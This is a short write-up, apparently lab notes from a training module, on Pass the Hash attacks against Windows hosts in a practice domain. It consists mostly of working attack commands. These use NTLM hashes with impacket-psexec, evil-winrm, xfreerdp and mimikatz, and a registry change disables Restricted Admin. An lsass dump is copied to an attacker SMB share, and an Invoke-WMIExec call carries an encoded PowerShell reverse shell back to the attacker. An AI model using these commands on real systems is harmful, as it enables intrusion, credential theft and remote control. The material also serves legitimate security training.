Pass the Hash (PtH)

June 10, 2024

Administrator:30B3783CE2ABF1AF70F77D0660CF3453

impacket-psexec Administrator@10.129.74.50 -hashes :30B3783CE2ABF1AF70F77D0660CF3453

First we have to enable the pass the hash method to the machine via evil-winrm

./evil-winrm.rb -i 10.129.74.50 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

As we enable the passthehach technique we can now use xfreerdp to rdp into the machine

xfreerdp /v:10.129.74.50 /u:Administrator /pth:30B3783CE2ABF1AF70F77D0660CF3453

# First we have to setup the server
mkdir TmpShare
sudo impacket-smbserver share -smb2support TmpShare

# Then we will move the lsass.dmp from windows to attacker machine
move C:\Users\ADMINI~1\AppData\Local\Temp\2\lsass.DMP \\10.10.14.147\share

Then we will just use pypykatz to view our lsass.dmp

pypykatz lsa minidump lsass.DMP

david:c39f2beb3d2ec06a62cb887fb391dee0

As we enter the command below it will execute the mimikatz and it will spawn up a new cmd for us

mimikatz.exe privilege::debug "sekurlsa::pth /user:david /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /domain:inlanefreight.htb /run:cmd.exe" exit

Now we can read the david .txt as david user which is possible via PTH

Now we will run the exact command but as julio user

We get the ntlm hash from the pypykatz earlier so will be using that in mimikatz

Now we can read the julio.txt using this method

mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64f12cddaa88057e06a81b54e73b949b /domain:inlanefreight.htb /run:cmd.exe" exit

First we need to make a reverse shell for our machine

Attacker Machine IP / MS01 - 172.16.1.05

Victim Machine IP / DC01 - 172.16.1.10

Then we will just open up a cmd as administrator and use it as powershell

powershell

cd Tools\Invoke-TheHash

Import-Module .\Invoke-TheHash.psd1

Invoke-WMIExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64f12cddaa88057e06a81b54e73b949b -Command "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAxADYALgAxAC4ANQAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA"

nc -lnvp 443 

whoami
cd C:\julio
dir
more flag.txt

pypykatz lsa minidump lsass.DMP

john:c4b0e1b10c7ce2c4723b4e2407ef81a2

./evil-winrm.rb -i 10.129.230.115 -u john -H c4b0e1b10c7ce2c4723b4e2407ef81a2

PreviousPasswd, Shadow & Opasswd NextPass the Ticket (PtT) from Windows

Last updated 1 year ago